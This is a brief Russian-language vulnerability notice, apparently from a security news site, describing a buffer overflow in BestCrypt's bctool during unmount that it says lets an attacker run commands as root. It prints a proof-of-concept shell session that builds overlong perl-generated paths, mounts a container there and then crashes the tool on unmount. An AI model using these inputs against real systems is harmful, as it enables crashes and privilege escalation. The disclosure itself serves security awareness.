BestCrypt – Linux-овая и Windows
утилита для шифрования файловой системы.
При монтировании зашифрованного
контейнера программные пути проверяются,
однако при размонтировании – нет и именно
тут и можно переполнить один из буферов и
выполнить команды от root-а.

Пример:

foo:~ > mkdir /`perl -e 'print
"a"x255'`/`perl -e 'print "a"x255'`
foo:~ > bctool mount test.jbc /`perl -e 'print "a"x255'`/`perl -e 'print
"a"x255'`
Enter password:
foo:~ > ,b>bctool umount /`perl -e 'print "a"x255'`/`perl -e 'print
"a"x255'`
Segmentation fault
foo:~ >

Эксплоит

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии